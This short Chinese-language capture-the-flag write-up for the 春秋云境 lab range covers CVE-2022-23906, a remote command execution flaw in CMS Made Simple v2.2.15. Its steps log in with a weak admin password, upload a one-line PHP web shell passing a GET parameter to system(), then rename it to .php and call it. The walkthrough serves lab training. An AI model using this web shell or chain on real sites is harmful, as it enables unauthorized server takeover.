春秋云境:CVE-2022-23906
文章合集:春秋云境系列靶场记录(合集)
关注WX:【小白SEC】查看更多内容……
CMS Made Simple v2.2.15 RCE:CVE-2022-23906
漏洞介绍
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
解题步骤
-
访问后台登录URL,通过弱口令登录后台:admin/123456
-
通过图中位置进行图片上传文本格式的shell文件,比如1.txt,内容为:
<?php
system($_GET[1]);
phpinfo();
?>
-
上传成功后,选中此文件,并点击上方的copy进行复制,复制的文件名为:testshell.php
-
访问上传后的testshell.php,并执行命令查看flag:
文章合集:春秋云境系列靶场记录(合集)